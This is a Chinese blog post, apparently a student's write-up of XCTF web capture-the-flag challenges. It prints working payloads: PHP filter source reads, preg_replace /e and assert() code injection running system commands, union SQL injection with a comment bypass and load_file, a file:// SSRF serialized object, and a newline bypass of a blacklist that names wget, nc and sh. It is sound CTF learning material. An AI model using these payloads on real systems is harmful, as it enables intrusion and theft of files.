XCTF Web 记录(第四天、第五天)

最新推荐文章于 2022-09-10 14:05:00 发布
最新推荐文章于 2022-09-10 14:05:00 发布
阅读量236 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45742511/article/details/114370992
版权
这篇博客记录了XCTF Web挑战赛中的安全问题解决过程,包括ics-05的preg_replace函数漏洞利用,mfw的源码泄露与GitHack下载,fakebook的SQL注入,以及Cat和favorite_number的代码审计题目。通过源码分析、payload构造和漏洞利用,展示了Web安全中的常见攻击手段。
摘要由CSDN通过智能技术生成

题目

ics-05

题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

所以打开后直接点击设备维护中心,查看网页源码:
在这里插入图片描述
发现一可疑之处。

尝试使用伪协议读取index.php的源码:

?page=php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述
得到base64加密的源码,解码得到(关键部分):

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>



<?php

}else{

?>

                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
   

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

注意到这里要伪造X_FORWARDED_FOR头,抓包,添加头:
在这里插入图片描述

然后利用preg_replace()函数的漏洞,使用/e时,preg_replace() 将 replacement 参数当作 PHP 代码。

尝试构造payload:

?pat=/123/e&rep=system('ls')&sub=1234在这里插入图片描述

?pat=/123/e&rep=system("cd%20s3chahahaDir%26%26%20ls")&sub=1234
// %26表示&

在这里插入图片描述

?pat=/123/e&rep=system("cd%20s3chahahaDir/flag%26%26%20ls")&sub=1234

在这里插入图片描述

?pat=/123/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=1234

在这里插入图片描述

mfw

打开页面,有一个about页面:
在这里插入图片描述
可能存在源码泄露。

使用 GitHack 下载其源码:
在这里插入图片描述
有个flag.php,打开并没有什么有用信息。

打开index.php,得到:

<?php

if (isset($_GET['page'])) {
        $page = $_GET['page'];
} else {
        $page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

找到了这道题的利用点。

strpos() 函数查找字符串在另一字符串中第一次出现的位置。
$file是拼接得到的。
assert() 检查一个断言是否为 FALSE。
assert()会将括号中的字符当成代码来执行,并返回true或false。

这里没有任何过滤,构造payload:

'.system("cat ./templates/flag.php").'
1') or system('cat templates/flag.php');//

fakebook

查看源码:
在这里插入图片描述
输入a,报错,存在sql注入:
在这里插入图片描述
常规操作,判断出有4列。

使用联合注入,发现存在过滤:

?no=-1 union select 1,2,3,4#

那只能是union select中存在问题,尝试绕过,发现可以使用:

?no=-1 union/**/select 1,2,3,4#

然后正常操作,不记录了。

最后得到结果:
在这里插入图片描述
被序列化处理过的东西,发现其中的内容其实就是我们注册的内容(我这里注册的时候乱写的)。

想想查看robots.txt,果然得到了一些东西:
在这里插入图片描述
源码泄露。。。。

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

好好分析一下代码,想想利用方式。

好像都是对blog进行了处理。

注册的信息都被序列化进行存储。

我们还知道了绝对路径:/var/www/html/。

flag.php在这个路径下面。

我们可以利用sql函数直接读取:

?no=100 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 #

这里的考点其实是SSRF,具体的我也不是很了解,构造:

?no=-1 union/**/select 1,2,3,‘O:8:“UserInfo”:3:{s:4:“name”;s:1:“1”;s:3:“age”;i:1;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}’

enen这道题先到这吧,后面在详细了解一下。

Cat

懵的一 !

Cat

favorite_number

一道代码审计题目

 <?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

有几个需要绕过的地方,逐一分析一下:

if($stuff === $array && $stuff[0] != 'admin')

$stuff强等于数组$array,第一个元素不等于admin。

这里提示了 php 5.5.9 ,查了查绕过方式:

大致意思就是:

在数组中,a[0]===a[0x1000000000] // bool(true)

所以构造payload:

stuff[4294967296]=admin&stuff[1]=user&num=111

得到:
在这里插入图片描述
第一个绕过成功。

接下来绕过正则:

if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num))

要求是数字,不能有一些字符。

这里没有进行换行匹配,所以我们可以使用%0a进行换行,绕过第一条正则:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a ls /

这里hackbar好像用不了。

在这里插入图片描述
这里学到了新姿势,使用索引的方式:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a ls -i /

在这里插入图片描述
反引号进行执行读取内容:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a more `find / -inum 31458297`

总结一下这道题:

考查key溢出问题
又学到了读取文件的新姿势

后记:

今天只记录了一道题,因为后面的题对于我自己来说开始变得困难,所以后面每天记录一道题,理解每一道题,把之前记录的题好好理解,复习一下。

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9585
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
XCTF Web 记录(第二天)
ximo的博客
03-02 337
题目PHP2unserialize3upload1nizhuansiwei PHP2 进去后什么都没有,扫目录,得到 index.phps,访问: 1.对id值进行url解码 2.id值等于admin 因为浏览器本身会进行一次url解码,这里相当于进行了二次解码,所以对admin进行两次url编码: %2561%2564%256d%2569%256e 知识点: url编码: url编码就是其16进制前添加%。例:hex(a)=61,url(a)=%61 那么二次编码,相当于对%进行一次url编码
XCTF web bug
H4ppyD0g的博客
09-06 396
注册后登陆,发现有manage,点击一下,说不是管理员,没有权限,那就得想办法获得管理员权限 退出,回到登录界面,点击Findpwd 输入信息后第二步就可以直接修改密码了。这个时候用burpsuite抓包,把user改成admin就可以把admin改成想要的密码。 登录admin,再点击manage,ip不允许,修改XFF头为127.0.0.1可以访问。 在网页源代码中发现传参,把do设为uplo...
xctf 攻防世界 web wp 高手进阶区(持续更新中)
m0_55854679的博客
06-22 338
baby_web 点击题目链接,可以看到一个1.php的页面。 题目要求是查看初始页面,在url后面添加index.php【单一入口的应用程序就是说用一个文件处理所有的HTTP请求,例如不管是列表页还是文章页,都是从浏览器访问index.php文件,这个文件就是这个应用程序的单一入口。由于所有的http请求都由index.php接收,所以可以进行集中的安全性检查,如果不是单一入口,那么开发者就必须记得在每一个文件的开始加上安全性检查代码。工作都被集中到了index.php来完成,可以减轻我们维护其他功能代
xctf 攻防世界web2
freerats的博客
10-25 484
打开题目,出现一段加密代码 题目思路比较简单,逆向加密算法,也告诉了加密后的结果,一步步解密回去就行 $miwen=“a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws” rot13得:n1mYotDfPRFRVdEYjhDNlZjYld2Y5IjOkdTN3EDNlhzM0gzZiFTZ2MjO4gjf 就然后查了一下str...
攻防世界 Web高手进阶区 favorite_number
feng的博客
12-21 916
知识点 PHP的数组key溢出。 PHP的preg_match的/m绕过。 命令执行绕过。 WP 昨天偶然翻自己的收藏夹,突然翻到了攻防世界,差点忘了攻防世界的web还没刷完。。就回来稍微看了个题目,还是挺有意思的,不过我也没能完全独立做出来,前两个点都遇到了问题,反而是最后的命令执行做的比较轻松。 首先进入环境,审一下代码: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $
XCTF Web 记录(bug)
ximo的博客
03-11 139
bug 进页面,没什么有用的信息,一个注册,一个找回密码: 先注册一个,登录进去看看: 第二个选项点击,提示: 在找回密码中,尝试输入,抓包: 尝试将username改为admin: 修改成功,进行登录,登录成功。 点击第二个选项: 显示IP不允许,构造X-Forwarded-For: ok: 查看源码: 提示文件的操作,上传,下载,删除??(upload,download,delete): upload成功,文件上传。 上传图片: 上传php文件: 上传内容文php代码的图片:
XCTF web wp
Mr_Shiyang的博客
04-13 488
计算字符串 "Hello" 的 MD5 散列:
6-XCTF-Web-unfinish(二次注入)
cquptcqupt的博客
08-17 302
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
XCTF攻防世界-web
yu_jing_hong的博客
09-22 327
1.查看源码 可以用快捷键ctrl+U 得到flag 2.robots robot就是机器人的意思,robots.txt就是关于机器人的一个协议文档,这个机器人指搜索引擎的蜘蛛,在《互联网搜索引擎服务自律公约》第七条有“遵循国际通行的行业惯例与商业规则,遵守机器人协议(robots协议)。这个文档是搜索引擎中访问网站的时候要查看的第一个文件,文件中会明确告诉搜索引擎允不允许访问这个网站。 访问robots.txt文档 robots.txt的两条规则 ①User-age..
XCTFWeb进阶区部分 WriteUp(一)
野原新之助
10-24 805
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
攻防世界WEB练习-favorite_number
墨鱼菜鸡
09-10 158
目录 题目场景 代码审计及绕过 通过php5.5版本的数组key溢出漏洞进行数组绕过 换行符绕过正则跨行匹配 黑名单绕过 题目场景 <?php //php5.5.9 $stuff=$_POST["stuff"]; $array=['admin','user']; if($stuff===$array&&amp...
攻防世界----favorite_number
qq_44418229的博客
07-20 613
攻防世界----favorite_number 知识点1 php5.5.9版本数字溢出漏洞 知识点2 代码执行的绕过技巧
XCTF favorite_number wp
weixin_45253216的博客
01-14 708
网安菜鸡今天来划水了! CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 题解: 首先打开题目环境,是一种比较熟悉的格式,页面显示一段php源码: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num=
CTFSHOW(命令执行)【学习记录
ximo的博客
01-27 2770
学习记录web29web30web31 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 对 flag 进行了过滤: 姿势学习: c=system('cat f*'); #正则表达式 c=
CTFSHOW 文件上传(学习记录
ximo的博客
02-16 812
目录Web 151Web 152Web 153Web 154Web 155Web 156Web 157Web 158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168Web 169Web 170 Web 151 前端验证,抓包修改数据OK Web 152 直接上传一句话木马,连接即可 Web 153 参考链接: 文件上传漏洞——.htaccess和.user.ini配置文件的应用 因为该环境是nginx搭建的,所以.h
GKCTF2020 - Web(cve版签到)
ximo的博客
03-16 660
[GKCTF2020]cve版签到 考点:cve-2020-7066与漏洞的利用。 漏洞原理: 在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 get_headers()返回一个数组,其中包含服务器响应HTTP请求而发送的标头。示例
ctfshow PHP特性(89-115)【学习记录
ximo的博客
02-17 566
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } intval() 函数用于获取变量的整数值。 但是要绕过正
XCTF Web 记录(unagi)
ximo的博客
03-09 355
unagi 打开页面,四个跳转。 一个提示页面: 一个利用方式提示: 一个利用点: 利用方式: XXE注入。 构造XXE注入代码: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <pa
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值